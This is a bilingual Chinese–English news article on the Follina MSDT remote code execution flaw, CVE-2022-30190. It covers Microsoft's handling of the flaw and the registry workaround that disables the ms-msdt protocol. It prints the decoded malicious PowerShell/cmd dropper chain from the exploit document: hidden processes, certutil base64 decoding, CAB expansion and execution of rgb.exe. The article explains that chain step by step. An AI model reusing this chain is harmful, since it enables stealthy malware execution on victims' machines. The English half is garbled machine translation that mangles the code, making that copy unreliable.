Shadow Chaser Group 的研究人员在 Twitter 上表示,这个存在于 Microsoft Support Diagnostic Tool 中的漏洞已经于 4 月 12 日报告给微软,并已经证明该漏洞已经被黑客利用进行攻击。
不过给该研究人员的回复中,微软安全响应中心团队并未将报告的行为视为安全漏洞,因为据推测,MSDT 诊断工具在执行有效负载之前需要密码。
不过本周一,微软改变了口风,将该漏洞标识为 CVE-2022-30190,并将其描述为“关键”(critical)漏洞。
在公告中写道:“当从 Word 等调用应用程序使用 URL 协议调用 MSDT 时,存在远程代码执行漏洞。成功利用此漏洞的攻击者可以使用调用应用程序的权限运行任意代码。然后攻击者可以安装程序、查看、更改或删除数据,或者在用户权限允许的上下文中创建新帐户”。
在本文发表时,微软尚未发布补丁。相反,它建议客户通过以下方式禁用 MSDT URL 协议:
1. 以管理员身份运行命令提示符。
2. 要备份注册表项,请执行命令“reg export HKEY_CLASSES_ROOT\ms-msdt filename”
3. 执行命令“reg delete HKEY_CLASSES_ROOT\ms-msdt /f”
虽然最初被微软遗漏了,但当研究人员发现周五上传到 VirusTotal 的 Word 文档利用了以前未知的攻击媒介时,该漏洞再次被发现。
根据研究员 Kevin Beaumont 的分析,该文档使用 Word 从远程 Web 服务器检索 HTML 文件。然后,该文档使用 MSProtocol URI 方案来加载和执行 PowerShell 命令。
虽然在理论上这不太可能实现,但事实上确实是可以的。当文档中的命令被解码时,它们会转换为:
$cmd ="c:\Windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList"/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList"/c cd C:\users\public\&&for /r
%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";
根据 Huntress 的解释,该脚本实现的操作为
在隐藏窗口运行以下操作
1. 如果 msdt.exe 正在运行,则终止它
2. 循环遍历 RAR 文件中的文件,查找编码 CAB 文件的 Base64 字符串
3. 将此 Base64 编码的 CAB 文件存储为 1.t
4. 解码Base64编码的CAB文件保存为1.c
5. 将1.c CAB文件展开到当前目录,最后:
6. 执行rgb.exe(大概压缩在1.c CAB文件里面)
Shadow Chaser Group researchers said on Twitter that the vulnerability in Microsoft Support Diagnostic Tool was reported to Microsoft on April 12 and has been proved to have been exploited by hackers.
In the response to the researcher, however, the Microsoft Security response Center team did not regard the reported behavior as a security breach because the MSDT diagnostic tool presumably required a password before executing the payload.
On Monday, however, Microsoft changed its tune, identifying the vulnerability as CVE-2022-30190 and describing it as a “critical” vulnerability.
“there is a remote code execution vulnerability when calling MSDT using the URL protocol from calling applications such as Word,” the announcement said. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install the program, view, change, or delete the data, or create a new account in the context allowed by user privileges.
At the time of publication of this article, Microsoft had not released a patch. Instead, it recommends that customers disable the MSDT URL protocol in the following ways:
1. Run the command prompt as an administrator.
2. 要备份注册表项,请执行命令“reg export HKEY_CLASSES_ROOT\ms-msdt filename”
3. 执行命令“reg delete HKEY_CLASSES_ROOT\ms-msdt /f”
Although initially omitted by Microsoft, the vulnerability was rediscovered when researchers discovered that the Word document uploaded to VirusTotal on Friday took advantage of previously unknown attack vectors.
According to the analysis of researcher Kevin Beaumont, the document uses Word to retrieve HTML files from a remote Web server. The document then uses the MSProtocol URI scheme to load and execute PowerShell commands.
Although this is unlikely to happen in theory, it is possible in fact. When the commands in the document are decoded, they are converted to:
$cmd ="c:\Windows\system32\cmd.exe";
Start-Process $cmd-windowstyle hidden-ArgumentList”/c taskkill / f / im msdt.exe"
Start-Process $cmd -windowstyle hidden -ArgumentList"/c cd C:\users\public\&&for /r
% temp%% I in (05-2022-0438.rar) do copy% I 1.rar / yearly amphibian TVNDRgAAAA 1.rarampstr 1.raramptil-decode 1.t &expand 1.c-FRV *.
According to Huntress, the script implements the following actions
Run the following in a hidden window
1. If msdt.exe is running, terminate it
two。 Loop through the files in the RAR file to find the Base64 string that encodes the CAB file
3. Save this Base64-encoded CAB file as 1.t
4. The CAB file that decodes the Base64 code is saved as 1.c
5. Expand the 1.c CAB file to the current directory, and finally:
6. Execute rgb.exe (probably compressed in 1.c CAB file)